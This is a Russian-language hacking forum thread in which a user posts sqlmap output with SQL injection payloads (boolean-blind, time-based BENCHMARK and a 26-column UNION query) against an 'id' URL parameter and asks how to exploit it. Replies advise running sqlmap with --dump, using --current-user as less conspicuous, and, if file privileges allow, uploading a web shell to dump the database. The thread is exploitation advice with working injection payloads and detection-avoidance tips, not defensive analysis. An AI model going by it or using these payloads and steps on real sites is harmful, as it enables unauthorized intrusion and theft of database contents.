28.08.2018, 14:28
|
|
Участник форума
Регистрация: 27.08.2018
Сообщений: 137
С нами:
4059598
Репутация:
0
|
|
Добрый день!
При работе с sqlmap, мне выдало следующее:
Код:
Код:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=56' AND 7536=BENCHMARK(5000000,MD5(0x48444365)) AND 'FSfa'='FSfa
Type: UNION query
Title: MySQL UNION query (NULL) - 26 columns
Payload: id=-6433' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6a6b71,0x717a6654616a7250436d4f46594972424768546c65456a425a484a504b6e6362454f6b4d50425851,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL#
Подскажите, как это можно эксплуатировать? |
|
|
28.08.2018, 14:33
|
|
Новичок
Регистрация: 10.10.2017
Сообщений: 0
С нами:
4521582
Репутация:
0
|
|
g00db0y сказал(а):
Добрый день!
При работе с sqlmap, мне выдало следующее:
Код:
Код:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=56' AND 7536=BENCHMARK(5000000,MD5(0x48444365)) AND 'FSfa'='FSfa
Type: UNION query
Title: MySQL UNION query (NULL) - 26 columns
Payload: id=-6433' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6a6b71,0x717a6654616a7250436d4f46594972424768546c65456a425a484a504b6e6362454f6b4d50425851,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL#
Подскажите, как это можно эксплуатировать?
Например подставить значение поля payload в url?
|
|
|
|
28.08.2018, 14:36
|
|
Участник форума
Регистрация: 27.08.2018
Сообщений: 137
С нами:
4059598
Репутация:
0
|
|
sudo сказал(а):
Например подставить значение поля payload в url?
вставлял, и добавлял GROUP BY, UNION SELECT, и прочее, ничего не помогло
|
|
|
|
28.08.2018, 15:02
|
|
Новичок
Регистрация: 10.10.2017
Сообщений: 0
С нами:
4521582
Репутация:
0
|
|
g00db0y сказал(а):
вставлял, и добавлял GROUP BY, UNION SELECT, и прочее, ничего не помогло
Значит прога ошиблась и пейлоады оказались нерабочими. Логично?
|
|
|
|
28.08.2018, 15:10
|
|
Участник форума
Регистрация: 27.08.2018
Сообщений: 137
С нами:
4059598
Репутация:
0
|
|
sudo сказал(а):
Значит прога ошиблась и пейлоады оказались нерабочими. Логично?
А ведь логично, спасибо!
|
|
|
|
07.09.2018, 22:01
|
|
Новичок
Регистрация: 04.09.2018
Сообщений: 0
С нами:
4047575
Репутация:
0
|
|
А зачем тебе в урл добавлять, раскрути sqlmap там же есть специальная функция, почитай help
|
|
|
|
08.09.2018, 01:42
|
|
Новичок
Регистрация: 14.10.2012
Сообщений: 1
С нами:
7146326
Репутация:
0
|
|
сразу берешь и добавляешь --dump, если он раскрутит уязвимость, сразу тебе и дамп сделает если сможет
|
|
|
|
08.09.2018, 12:59
|
|
Новичок
Регистрация: 02.04.2018
Сообщений: 0
С нами:
4271840
Репутация:
0
|
|
Iskus сказал(а):
сразу берешь и добавляешь --dump, если он раскрутит уязвимость, сразу тебе и дамп сделает если сможет
Я обычно добавляю что-то типа --current-user. Менее палево, нежели делать вероятно ненужный дамп. Лучше руками побегать по таблицам посмотреть что есть. Если filepriv позволяет писать файлы - заливаем шелл - дампим базу не селектами. (сценарий из разряда "как в сказке ")
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
